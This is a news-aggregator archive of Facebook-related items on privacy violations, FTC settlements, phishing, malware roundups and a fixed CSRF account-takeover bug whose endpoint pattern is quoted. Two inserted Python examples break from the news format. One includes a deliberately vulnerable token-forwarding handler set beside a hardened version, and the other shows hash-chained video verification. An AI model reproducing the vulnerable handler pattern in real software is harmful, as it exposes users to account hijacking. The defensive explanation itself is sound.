Category Archives: facebook

Test Shows Facebook Begins Collecting Data From Several Popular Apps Seconds After Users Start Consuming Them. Company Also Collects Data of Non-Facebook Users.

Millions of smartphone users confess their most intimate secrets to apps. Unbeknown to most people, in many cases that data is being shared with someone else: Facebook. [Editor's note: the link may be paywalled; an alternative source was not immediately available.] The Wall Street Journal reports: The social-media giant collects intensely personal information from many popular smartphone apps just seconds after users enter it, even if the user has no connection to Facebook, according to testing done by The Wall Street Journal. The apps often send the data without any prominent or specific disclosure, the testing showed. [...] In the case of apps, the Journal's testing showed that Facebook software collects data from many apps even if no Facebook account is used to log in and if the end user isn't a Facebook member. In the Journal's testing, Instant Heart Rate: HR Monitor, the most popular heart-rate app on Apple's iOS, made by California-based Azumio, sent a user's heart rate to Facebook immediately after it was recorded. Flo Health's Flo Period & Ovulation Tracker, which claims 25 million active users, told Facebook when a user was having her period or informed the app of an intention to get pregnant, the tests showed. Real-estate app Realtor.com, owned by Move, a subsidiary of Wall Street Journal parent News Corp, sent the social network the location and price of listings that a user viewed, noting which ones were marked as favorites, the tests showed. None of those apps provided users any apparent way to stop that information from being sent to Facebook.

Read more of this story at Slashdot.

How to Stop Facebook App From Tracking Your Location In the Background

Every app installed on your smartphone with permission to access location services can continually collect your real-time location, even in the background when you are not using it. Did you know? Installing the Facebook app on your Android or iOS smartphone automatically gives the social media company your consent to collect a history of your precise location. If you

Cyber Security Week in Review (Feb. 22)



Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • U.S. officials charged a former member of the Air Force with defecting in order to help an Iranian cyber espionage unit. The Department of Justice says the woman collected information on former colleagues, after which Iranian hackers attempted to target those individuals and install spyware on their computers.
  • The U.S. Department of Justice is dismantling two task forces aimed at protecting American elections. The groups were originally created after the 2016 presidential election to prevent foreign interference, but after the 2018 midterms the Trump administration shrank them significantly.
  • Facebook and the U.S. government are closing in on a settlement over several privacy violations. Sources familiar with the discussions say it will likely result in a multimillion-dollar fine, expected to be the largest the Federal Trade Commission has ever imposed on a technology company.

From Talos


  • There’s been a recent uptick in Brushaloader infections. While the malware has been around since mid-2018, this new variant is more difficult than ever to detect on infected machines. New features include the ability to evade detection in sandboxes and to avoid anti-virus protection.
  • New features in WinDbg make it easier for researchers to debug malware. A new JavaScript bridge brings WinDbg in line with other modern programs. Cisco Talos walks users through these new features and shows how to use them.

Malware roundup


  • Google says it’s stepping up its banning of malicious apps. The company says it has seen a 66 percent increase in the number of apps it has banned from the Google Play store over the past year. Google says it scans more than 50 billion apps a day on users’ phones for malicious activity.
  • A new campaign using the Separ malware is attempting to steal login credentials at large businesses. The malware uses short scripts and legitimate executable files to avoid detection. 
  • A new ATM malware called "WinPot" turns the machines into "slot machines." This allows hackers to essentially gamify ATM hacking, randomizing how much money the machine dispenses. 

The rest of the news


  • The U.S. is reviving a secret program to carry out supply-chain attacks against Iran. The cyber attacks are targeted at the country’s missile program. Over the past two months, two of Iran’s efforts to launch satellites have failed within minutes, though it’s difficult to assign those failures to the U.S. 
  • Australia says a “sophisticated state actor” carried out a cyber attack on its parliament. The ruling Liberal-National coalition parties say their systems were compromised in the attack. Since then, the country says it’s put “a number of measures” in place to protect its election system. 
  • Cisco released security updates for 15 vulnerabilities. Two critical bugs could allow attackers to gain root access to a system, and a third opens the door for a malicious actor to bypass authentication altogether. 
  • Facebook keeps a list of users that it believes could be a threat to the company or its employees. The database is made up of users who have made threatening posts against the company in the past. 


Former Facebook Employees Say The Company’s Prioritization Of Privacy is About Optics

Last May, Facebook promised to launch a "Clear History" feature that it said would give users more control over their data. Nine months later it's nowhere to be found, and now a report claims that it's a key example of the company's "reactionary" way of dealing with privacy concerns. From a report: Thus far, Facebook's public discussions of Clear History appear to have been more about communications strategy than charting a new course. In a Facebook post looking back on 2018, Zuckerberg pointed to the tool as one that would "give people more transparency" while Sandberg highlighted it to show Facebook's willingness to change during a speech at the World Economic Forum in Davos, Switzerland, last month. Still, nine months after its initial announcement, Clear History is nowhere to be found. "We want to make sure this works the way it should for everyone on Facebook, which is taking longer than expected," the company said in a statement to BuzzFeed News. It's unclear if new high-profile hires, like Nate Cardozo (formerly of EFF) and Robyn Greene (formerly of New America's Open Technology Institute), will work with Facebook's new privacy unit or if they will be involved with Clear History. It has reached out to groups like Access Now, the Electronic Frontier Foundation (EFF), and the Center for Democracy and Technology (CDT), as well as academics. Sources confirmed that CDT and EFF were advising Facebook on its Clear History tool, but could not disclose specifics of their meetings due to nondisclosure agreements. Access Now's Masse confirmed Facebook had reached out on a number of issues, including Clear History, in the last few months, but called the conversations "punctual and limited." "Despite repeated statements and apologies from the company, we are not seeing a shift in Facebook data practices or an attitude that would suggest that they take data protection seriously," she said.

Read more of this story at Slashdot.

Facebook Continued To Identify Users Who Are Interested in Nazis — and Then Used the Info To Let Advertisers Target Them, Investigation Finds

An anonymous reader shares a report: Facebook makes money by charging advertisers to reach just the right audience for their message -- even when that audience is made up of people interested in the perpetrators of the Holocaust or explicitly neo-Nazi music. Despite promises of greater oversight following past advertising scandals, a Times review shows that Facebook has continued to allow advertisers to target hundreds of thousands of users the social media firm believes are curious about topics such as "Joseph Goebbels," "Josef Mengele," "Heinrich Himmler," the neo-nazi punk band Skrewdriver and Benito Mussolini's long-defunct National Fascist Party. Experts say that this practice runs counter to the company's stated principles and can help fuel radicalization online. "What you're describing, where a clear hateful idea or narrative can be amplified to reach more people, is exactly what they said they don't want to do and what they need to be held accountable for," said Oren Segal, director of the Anti-Defamation League's center on extremism. After being contacted by The Times, Facebook said that it would remove many of the audience groupings from its ad platform.

Read more of this story at Slashdot.

Facebook’s AI chief suggests working on a new class of semiconductor

Facebook Plans To Develop Its Own Semiconductor Design

Last year, Facebook revealed its plans to start designing and building its own chips to power its AI (artificial intelligence) systems and hardware devices. Essentially, the social media giant is looking to develop its own semiconductors to reduce its dependence on chipmakers like Intel and Qualcomm.

In an interview with The Financial Times on Monday, Facebook’s chief AI scientist, Yann LeCun, said the company is developing a new class of semiconductor that will work differently from most current designs.

The idea is to develop semiconductors that can train deep learning algorithms more efficiently. The chips would also deliver the faster computation Facebook needs to reach new AI goals, including digital assistants with common sense.

“In terms of new uses, one thing Facebook would be interested in is offering smart digital assistants — something that has a level of common sense,” LeCun told the Financial Times. “They have background knowledge and you can have a discussion with them on any topic.”

LeCun reportedly wants Facebook’s digital assistant to be more like humans and to understand “what will happen when the world responds to [its] interactions with it.”

Facebook also reportedly plans to develop AI chips that can monitor content in real time, to help human moderators decide what content should stay on the platform and what should be removed. LeCun also apparently wants to reduce the power consumption of the chips and make them process information much faster.

Facebook is not the first company looking to design its own chips for AI. Alphabet Inc.’s Google, for example, has developed its own chips to help power its AI systems, search ranking and other features, while Apple Inc. has also launched its own chips to improve the power and efficiency of its devices.

The post Facebook’s AI chief suggests working on a new class of semiconductor appeared first on TechWorm.

Smashing Security #116: Stalking debtors, Facebook farce, and a cyber insurance snag

How would *you* track someone who owed you money? What was the colossal flaw Facebook left on its website for anyone to exploit and hijack accounts? And what excuse are insurance companies giving for not paying victims of the NotPetya malware millions of dollars?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Joe Carrigan of the Information Security Institute at Johns Hopkins University.

Facebook Now Lets Android Users Block Background Collection of Location Data

Facebook has rolled out an update to Android users that gives them a greater degree of control over the sharing of location data with the social network. From a report: Specifically, the update makes it possible to stop Facebook from tracking your location in the background when you are not using the app. The change brings parity between the iOS and Android Facebook apps. In introducing the new finer-grained controls, Facebook insists that it is "not making any changes to the choices you've previously made nor are we collecting any new information."

Read more of this story at Slashdot.

CSRF vulnerability in Facebook allows attackers to hijack accounts with a single click

Facebook pays $25,000 to security researcher for discovering CSRF exploit that leads to stealing accounts

A security researcher discovered a critical cross-site request forgery (CSRF) vulnerability that would allow hackers to take over Facebook accounts simply by tricking the victim into clicking a malicious link.

The cybersecurity expert who goes by the pseudonym “Samm0uda” discovered a vulnerability after noticing an exposed endpoint (facebook.com/comet/dialog_DONOTUSE/), which could be exploited to bypass the CSRF protections and perform various actions on behalf of the victim.

“This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and makes a POST request to that endpoint after adding the fb_dtsg parameter. Also this endpoint is located under the main domain www.facebook.com which makes it easier for the attacker to trick his victims to visit the URL,” the researcher says on his blog.

“The vulnerable endpoint is:
https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body).”

The researcher found that the bug made it possible not only to post on the timeline of targeted Facebook users’ accounts, but also to delete their profile images and trick them into deleting their accounts. In the latter case, the attack only succeeds if the victim also enters his password.

The flaw could also have been exploited to take control of an account using requests that change the email address or mobile number associated with the victim’s account. If an attacker succeeds in adding his own email address or phone number, he can use the password reset function to set a new password and lock the original owner out of the account.

Exploiting this would require some effort on the part of the attacker, as he would need to trick the user into following two separate links: one to add the email address or phone number and another to confirm it. However, the expert was able to create a single URL that allowed him to obtain the victim's access token.

Samm0uda reported his findings to Facebook on January 26, 2019. The social media giant acknowledged the issue and fixed the problem on January 31, 2019. Facebook awarded the researcher a $25,000 bounty as part of the company’s bug bounty program.

You can read more about Samm0uda’s findings here.

The post CSRF vulnerability in Facebook allows attackers to hijack accounts with a single click appeared first on TechWorm.

Rietspoof malware distributes ransomware via messaging apps

By Waqas

A malware strain dubbed Rietspoof has been tracked by researchers at Avast since last August. Reportedly, the researchers suspect that the malware is on the rise and that it is being distributed via Skype, Facebook Messenger, and other messaging apps. Researchers maintain that the malware is actually a dropper designed to allow dangerous ransomware to […]

This is a post from HackRead.com Read the original post: Rietspoof malware distributes ransomware via messaging apps

‘Digital Gangster’ Facebook Intentionally and Knowingly Violated UK Privacy and Competition Rules, British Lawmakers Say

British lawmakers on Sunday accused Facebook of having "intentionally and knowingly violated both data privacy and anti-competition laws" in the country, and they called for investigations into the social media giant's business practices. From a report: The sharp rebuke came in a 108-page report written by members of Parliament, who in 2017 began a wide-ranging study of Facebook and the spread of malicious content online. They concluded that the United Kingdom should adopt new regulations so lawmakers can hold Facebook and its tech peers in Silicon Valley accountable for digital misdeeds. "Companies like Facebook should not be allowed to behave like 'digital gangsters' in the online world," U.K. lawmakers said in their report, "considering themselves to be ahead of and beyond the law."

Read more of this story at Slashdot.

Facebook login phishing campaign can deceive tech-savvy users

Security experts at Myki have recently discovered a new phishing campaign that could deceive even the most tech-savvy users.

The technique relies on reproducing a social login prompt, in a very realistic form, inside an HTML block.

Crooks are distributing links to blogs and services that prompt users to “log in using a Facebook account” in order to read an exclusive article or purchase a discounted product.

The login popup is built in HTML and looks very realistic: the status bar, navigation bar, shadows, and content all look exactly like those of a legitimate login prompt.

When users visit the malicious website, they are prompted to log in with a social account. Once a login method is selected, the fake login prompt is displayed.

The credentials provided by the users are sent to the attacker.

When users click the “log in with Facebook” button on any website, they are either redirected to facebook.com or served facebook.com in a new pop-up browser window, asking them to enter their Facebook credentials to authenticate using OAuth and permit the service to access their profile data.

Users can also interact with the fake browser window, drag it where they want or close it like any legitimate window.

“The only way to protect yourself from this type of attack is to actually try to drag the prompt away from the window it is currently displayed in. If dragging it out fails (part of the popup disappears beyond the edge of the window), it’s a definite sign that the popup is fake,” the experts conclude.

Pierluigi Paganini

(SecurityAffairs – phishing, Facebook)

The post Facebook login phishing campaign can deceive tech-savvy users appeared first on Security Affairs.

Facebook paid $25,000 for CSRF exploit that leads to Account Takeover

Facebook paid a $25,000 bounty for a critical cross-site request forgery (CSRF) vulnerability that could have been exploited to hijack accounts simply by tricking users into clicking on a link.

The white hat hacker who goes online with the moniker “Samm0uda” discovered a critical CSRF vulnerability in Facebook and the social network giant paid a $25,000 bounty.

“This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link.” wrote the expert.

The flaw resides in the facebook.com/comet/dialog_DONOTUSE/ endpoint; the hacker leveraged it to bypass CSRF protections and act on the user’s behalf by tricking him into clicking a malicious URL.

“This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and make a POST request to that endpoint after adding the fb_dtsg parameter. Also this endpoint is located under the main domain www.facebook.com which makes it easier for the attacker to trick his victims to visit the URL.” continues the expert.

“The vulnerable endpoint is:
https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body).”

Facebook CSRF

Samm0uda published PoC URLs that could allegedly be exploited to post something on a user’s timeline and delete their profile picture.

The flaw could have been exploited even to delete the account of a targeted user, but in this case, victims have to provide their password before the account is deleted.

The flaw could have also been exploited to take control of an account by using requests that would change the targeted user’s email address or phone number associated with the account. Once the attacker has added his email address or phone number to an account, he can start a password reset.

Of course, to take full control over a Facebook account the attacker would have had to use the flaw twice: the first time to replace the victim's email address or phone number, and the second time to confirm the change.

The expert was also able to create a single link that allowed him to obtain the access token of the victims.

Below is the timeline of the flaw:

Jan 26, 2019 — Report sent
Jan 26, 2019 — Acknowledged by Facebook
Jan 28, 2019 — More details sent
Jan 31, 2019 — Fixed by Facebook
Feb 12, 2019 — $25,000 bounty awarded by Facebook

Pierluigi Paganini

(SecurityAffairs – CSRF, hacking)


The post Facebook paid $25,000 for CSRF exploit that leads to Account Takeover appeared first on Security Affairs.
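This item and the earlier TechWorm write-up describe the same design flaw: a dialog endpoint that accepts any target path in a `url` parameter and replays it server-side as a POST with the session's CSRF token stamped in, so the token check on the target endpoint never protects the user. The Python below is an added illustration and is not Facebook's code, its fix, or the researcher's proof of concept; the `Request` shape, the `ALLOWED_TARGETS` allowlist, the `/dialog/share` and `/settings/contact` paths and the session values are all constructed for the example. It contrasts a forwarding handler with that flaw against one that forwards only when the dialog request is itself a token-bearing POST and the target is a relative path on an explicit allowlist.

```python
import secrets
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample session for a logged-in user; fb_dtsg stands in for the
# per-session CSRF token named in the write-ups (not a real token).
SESSION = {"user": "alice", "fb_dtsg": secrets.token_hex(8)}


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (hypothetical shape)."""
    method: str
    path: str
    query: dict = field(default_factory=dict)   # parsed query string
    form: dict = field(default_factory=dict)    # parsed POST body


@dataclass
class ForwardedPost:
    """The server-side POST the dialog would issue on the user's behalf."""
    path: str
    body: dict


def _split_target(target: str):
    """Return (url parts, params) for a target like '/dialog/share?text=hi'."""
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return parts, params


def vulnerable_dialog(req: Request) -> Optional[ForwardedPost]:
    """The flawed pattern the write-ups describe: whatever 'url' names is
    replayed as a POST with the session token added. Because the dialog
    itself answers a plain GET, a link is enough to drive it."""
    target = req.query.get("url")
    if not target:
        return None
    parts, params = _split_target(target)
    params["fb_dtsg"] = SESSION["fb_dtsg"]  # token the caller never had to know
    return ForwardedPost(parts.path, params)


# Hardened variant (an assumed design, not Facebook's actual fix).
ALLOWED_TARGETS = {"/dialog/share", "/dialog/feed"}  # hypothetical allowlist


def hardened_dialog(req: Request) -> Optional[ForwardedPost]:
    # Gate 1: the dialog request must itself be a POST carrying a valid
    # fb_dtsg, so a bare link (GET) cannot trigger the forward at all.
    if req.method != "POST":
        return None
    if not secrets.compare_digest(req.form.get("fb_dtsg", ""), SESSION["fb_dtsg"]):
        return None
    # Gate 2: only relative, same-site targets from an explicit allowlist;
    # state-changing account endpoints are deliberately not on it.
    target = req.query.get("url")
    if not target:
        return None
    parts, params = _split_target(target)
    if parts.scheme or parts.netloc or parts.path not in ALLOWED_TARGETS:
        return None
    params["fb_dtsg"] = SESSION["fb_dtsg"]
    return ForwardedPost(parts.path, params)


def compare(req: Request) -> dict:
    """Run both handlers on one request and report whether each forwards."""
    return {
        "vulnerable_forwards": vulnerable_dialog(req) is not None,
        "hardened_forwards": hardened_dialog(req) is not None,
    }


if __name__ == "__main__":
    # Constructed cases: a link-driven GET aimed at an account-settings path,
    # and a legitimate token-bearing POST aimed at an allowlisted dialog.
    link_get = Request("GET", "/comet/dialog/", {"url": "/settings/contact?email=x"})
    legit_post = Request("POST", "/comet/dialog/", {"url": "/dialog/share?text=hi"},
                         {"fb_dtsg": SESSION["fb_dtsg"]})
    for name, r in [("link GET", link_get), ("token POST", legit_post)]:
        print(name, compare(r))
```

The two gates are independent on purpose: the POST-plus-token requirement stops the single-click delivery the articles describe, and the allowlist limits the blast radius if a token-bearing request is ever obtained some other way, since the forwarder can never reach email, phone or password endpoints regardless of what `url` says.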

Facebook Becomes ‘A Haven For the Anti-Vaccination Movement’

"As a disturbing number of measles outbreaks crop up around the United States, Facebook is facing challenges combating widespread misinformation about vaccinations on its platform," reported the Washington Post Wednesday, saying Facebook "has become a haven for the anti-vaccination movement" and that "the rise of 'anti-vaxx' Facebook groups is overlapping with a resurgence of measles" in the U.S. Facebook has publicly declared that fighting misinformation is one of its top priorities. But when it comes to policing misleading content about vaccinations, the site faces a thorny challenge. The bulk of anti-vaccination content doesn't violate Facebook's community guidelines for inciting "real-world harm," according to a spokesperson, and the site's algorithms often promote unscientific pages or posts about the issue... Wendy Sue Swanson, a pediatrician at Seattle Children's Hospital and spokeswoman for the American Academy of Pediatrics, recently met with Facebook strategists about dealing with public health issues, including misinformation about vaccines, on the platform... "Facebook isn't responsible for changing quacks but they do have an opportunity to change the way information is served up." But Facebook's algorithms often promote anti-vaccination content over widely accepted, scientifically backed posts or pages about vaccinations. A recent investigation from the Guardian found that Facebook search results regarding vaccines were "dominated by anti-vaccination propaganda...." 
Facebook also accepted advertising revenue from Vax Truther, Anti-Vaxxer, Vaccines Revealed and Michigan for Vaccine Choice, among others, according to another investigation from the Guardian [which found Facebook even offers the ability to target 900,000 users that Facebook has helpfully identified as interested in "vaccine controversies."] Last month YouTube promised to stop recommending videos that "could misinform users in harmful ways," and later told the Guardian that that would include anti-vaccine videos. The Guardian also noted this week that one anti-vaccination group on Facebook has over 150,000 members. But Facebook told the Post Wednesday that by not deleting the pseudoscience, they're actually giving their users an opportunity to speak up on their own and share factual counter-arguments themselves. By Thursday Facebook added that it was "exploring" additional steps, including "reducing or removing this type of content from recommendations, including 'Groups You Should Join,' and demoting it in search results, while also ensuring that higher quality and more authoritative information is available."

Read more of this story at Slashdot.

Facebook could be hit with a record-setting multi-billion dollar fine from the FTC for privacy violations

Facebook is negotiating a multi-billion dollar fine with the FTC over privacy probe

Facebook could be slapped with a multi-billion dollar fine from the FTC (Federal Trade Commission) over recent privacy lapses, according to a report from The Washington Post. The FTC has been investigating Facebook’s privacy- and security-violating practices related to the leaking of Facebook users' data to Cambridge Analytica last year.

For those unaware, Cambridge Analytica and Facebook were involved in a privacy scandal wherein the former had illegally lifted data of millions of Facebook users without their knowledge and consent and used it to influence voter trends in several countries. Facebook allowed thousands of app developers to harvest data through third-party online games and quizzes and then used it to target American voters with emotionally specific messaging. Facebook believes that as many as 87 million users’ personal data have been collected without their permission.

According to The Washington Post, Facebook and the FTC are negotiating a “multi-billion dollar” fine for the social networking giant’s privacy violations. However, the two sides haven’t agreed on an amount, as Facebook has allegedly disputed some of the FTC’s stipulations, The Washington Post said citing two unnamed sources.

Currently, the issue is whether Facebook is in violation of a 2011 consent agreement with the FTC, which required the social network to have a “comprehensive privacy program” and to get the “express consent” of users before sharing their data.

The fine imposed on Facebook for its privacy lapses could be the largest ever for a tech company. The previous largest FTC fine imposed on a tech firm was the $22.5 million penalty that Google was made to pay for violating an earlier privacy agreement with the agency.

Both Facebook and the FTC have declined to comment on the issue.

The post Facebook could be hit with a record-setting multi-billion dollar fine from the FTC for privacy violations appeared first on TechWorm.

Interviews: Ask Social Network Minds.com CEO and Founder Bill Ottman a Question

As you may have noticed, Facebook is not cool anymore. The social juggernaut has been mired in controversies -- infamous privacy scandals and the company's ruthless "grow fast and break things" approach to gaining users, to name a few. Luckily enough, some people are trying to build new social networks and are coming up with interesting original ideas. Minds.com is one such social network. The open source social network, which has been operational since 2012, works on a point-earning/exchange system to give users full control over the reach of their posts. One of the complaints people have with Facebook and Twitter is that they feel their posts are not being seen by all of their friends. Minds.com lets users earn points and then trade those points to boost their posts on the platform. Users earn tokens by being active on the platform and engaging in uploading, voting, commenting and other similar activities. They can then use these tokens, which can be exchanged within the platform, to boost the reach of their posts. The company last year launched a cryptocurrency reward program based on the Ethereum blockchain for all users on the platform. Minds says it does not determine what should be censored. Users are free to post whatever they want. (You can follow us on Minds.) We are excited to announce that Minds founder and chief executive Bill Ottman has agreed to do an interview with us. If you have a question about Minds.com for him or his take on the current social networking space, feel free to ask it in the comments section below.

Read more of this story at Slashdot.

Cyber Security Week in Review (Feb. 15, 2019)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
  • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with routing the country’s web requests only within the country rather than internationally. The country will run a trial later this year to test its cyber defenses.
  • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

From Talos


  • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
  • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
  • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

Malware roundup


  • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once a machine is infected, the malware can steal users’ personal information, and it uses several obfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
  • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask recipients to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to be available only to the National Credit Union Administration.
  • Google removed cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials and use them to drain users’ Ethereum funds.

The rest of the news


  • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record the hashes of the video, which would appear different a second time if the user had edited the video. All of these results are recorded on the public blockchain.
  • India asked Facebook to give its government a backdoor into the WhatsApp messaging app. That would require Facebook to hand over the contents of messages that are currently protected by end-to-end encryption.
  • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  
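The hash-recording idea behind the body-camera item above can be shown in a few lines. This is an added example, not Amber Authenticate's code: it splits a byte stream into fixed-size segments and hashes each one together with the previous digest, so an edit anywhere changes that segment's digest and every digest after it. The "published" list stands in for the blockchain record, and the sample footage is synthetic bytes, not a real video.

```python
import hashlib
from typing import List, Tuple

CHUNK = 64 * 1024  # bytes per segment; a real camera would use a time slice


def chain_hashes(video: bytes, chunk_size: int = CHUNK) -> List[str]:
    """Hash each segment together with the previous digest.

    Linking segments this way means an edit to any segment changes its own
    digest and every digest after it, so a chain recorded elsewhere (on a
    public blockchain in Amber's design; here just a list) both detects
    tampering and pinpoints where it starts.
    """
    digests = []
    prev = b"\x00" * 32  # genesis link
    for off in range(0, len(video), chunk_size):
        h = hashlib.sha256(prev + video[off:off + chunk_size]).digest()
        digests.append(h.hex())
        prev = h
    return digests


def verify(video: bytes, recorded: List[str], chunk_size: int = CHUNK) -> Tuple[bool, int]:
    """Recompute the chain and compare it to the published one.

    Returns (ok, first_bad_index); first_bad_index is -1 when ok. A file
    whose length changed yields a chain of different length, reported at
    the first index where the two chains diverge.
    """
    fresh = chain_hashes(video, chunk_size)
    for i, (a, b) in enumerate(zip(fresh, recorded)):
        if a != b:
            return False, i
    if len(fresh) != len(recorded):
        return False, min(len(fresh), len(recorded))
    return True, -1


def tamper(video: bytes, offset: int) -> bytes:
    """Flip one byte at `offset`, standing in for a frame edit."""
    return video[:offset] + bytes([video[offset] ^ 0xFF]) + video[offset + 1:]


# Constructed sample "footage": 5 segments of synthetic bytes (not a real video).
SAMPLE = bytes(range(256)) * 1280          # 327,680 bytes = 5 x 64 KiB
PUBLISHED = chain_hashes(SAMPLE)           # what the camera would have committed

if __name__ == "__main__":
    print("untouched:", verify(SAMPLE, PUBLISHED))
    print("edited in segment 3:", verify(tamper(SAMPLE, 3 * CHUNK + 10), PUBLISHED))
    print("truncated:", verify(SAMPLE[:-1], PUBLISHED))
```

The chaining is what turns a list of independent hashes into something that also localises an edit: with unchained per-segment hashes an attacker could splice in a replacement segment and only that one digest would differ, while here the digest of every later segment depends on the edited one.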


Facebook Settlement With FTC Could Run Into the Billions

An anonymous reader quotes a report from The New York Times: Facebook and the Federal Trade Commission are discussing a settlement over privacy violations that could amount to a record, multibillion-dollar fine, according to three people with knowledge of the talks. The company and the F.T.C.'s consumer protection and enforcement staff have been in negotiations over a financial penalty for claims that Facebook violated a 2011 privacy consent decree with the agency, said the people, who spoke on the condition of anonymity because the investigation is private. In 2011, Facebook promised a series of measures to protect user privacy after an investigation found it had harmed consumers with its handling of user data. The current talks have not yet reached the F.T.C.'s five commissioners for a vote and it is unclear how close the two sides are to wrapping up the nearly 11-month investigation. The commissioners met in mid-December and were updated by staff members that they had at that point found considerable evidence of violations of the 2011 consent decree. The FTC investigation into Facebook began after it was reported that the information of 87 million users had been harvested by a British political consulting firm, Cambridge Analytica, without their permission. The agency could seek up to $41,000 for each violation found.

Read more of this story at Slashdot.

Facebook Security Keeps a Detailed ‘Lookout’ List of Threats, Including Users and Former Employees, and Can Track Their Location

An anonymous reader shares a report: In early 2018, a Facebook user made a public threat on the social network against one of the company's offices in Europe. Facebook picked up the threat, pulled the user's data and determined he was in the same country as the office he was targeting. The company informed the authorities about the threat and directed its security officers to be on the lookout for the user. "He made a veiled threat that 'Tomorrow everyone is going to pay' or something to that effect," a former Facebook security employee told CNBC. The incident is representative of the steps Facebook takes to keep its offices, executives and employees protected, according to nine former Facebook employees who spoke with CNBC. The company mines its social network for threatening comments, and in some cases uses its products to track the location of people it believes present a credible threat. Several of the former employees questioned the ethics of Facebook's security strategies, with one of them calling the tactics "very Big Brother-esque." Other former employees argue these security measures are justified by Facebook's reach and the intense emotions it can inspire. The company has 2.7 billion users across its services. That means that if just 0.01 percent of users make a threat, Facebook is still dealing with 270,000 potential security risks. [...] One of the tools Facebook uses to monitor threats is a "be on lookout" or "BOLO" list, which is updated approximately once a week. The list was created in 2008, an early employee in Facebook's physical security group told CNBC. It now contains hundreds of people, according to four former Facebook security employees who have left the company since 2016. Facebook notifies its security professionals anytime a new person is added to the BOLO list, sending out a report that includes information about the person, such as their name, photo, their general location and a short description of why they were added. 
In recent years, the security team even had a large monitor that displayed the faces of people on the list, according to a photo CNBC has seen and two people familiar, although Facebook says it no longer operates this monitor.

Read more of this story at Slashdot.

Should you delete yourself from social media?

You’re feeling like you’ve had enough. All the recent news—from Facebook’s Cambridge Analytica snafu to various abuses of Twitter vulnerabilities—has you wondering: Should I delete myself from social media?

Social networking does have its positive aspects. You can stay in touch with distant (or not) relatives, be included in the planning of social events within your circle of friends, get real-time updates on regional and national news, and promote your company, content, or other personal ventures. Plus, you get to experience all the cool memes a full two weeks after they’ve been posted on Reddit.

Then again, there are quite a few reasons—spanning security, privacy, and overall shady business practices—for leaving. In 2018 alone, Facebook suffered a security breach that affected 50 million accounts, saw its platform used to incite genocide in Myanmar, kept user data it said it had deleted, and was caught abusing Apple’s enterprise developer program to run a data-collecting research app on teenagers. Twitter, meanwhile, has not only been on the receiving end of password bugs, hacks, and data breaches, but some could say it is these days a general dumpster fire of bot accounts.

Instagram and Snapchat are not without their flaws, either. Hackers are targeting influencer accounts on Insta, while Snapchat has been hit by phishing attacks and security breaches.

Unfortunately, we can’t make the decision to quit social media for you. Instead, we recommend you make a list of pros and cons. Consider what data might be lost. Consider what time and peace of mind might be gained. Weigh the rewards against the risks. If you come away feeling ready to take a step back, but not quite quit cold turkey, we can help you with ways to tighten security and privacy settings. And if that’s not enough, we’ll show you how to delete your accounts.

Let’s start slowly

If you’re not quite ready to cut the cord, a good option for cooling down on social media is to adjust the privacy settings on all of your accounts. This is a sensible thing to do even if you aren’t considering leaving. It also has the bonus side effect of increasing awareness of just how much you share on social media.

In a previous blog, we discussed how to secure your social media profiles in great detail. We recommend users who aren’t deleting themselves read this first to understand the intricacies, then work through the privacy settings of each of the top four social networking platforms.

After adjusting the settings, it’s a good idea to monitor and track your social media usage moving forward, whether for time management, focus, or beating social media addiction. As more and more of our media consumption moves to smartphones, there are several apps that can help you achieve these goals.

Goodbye, top four!

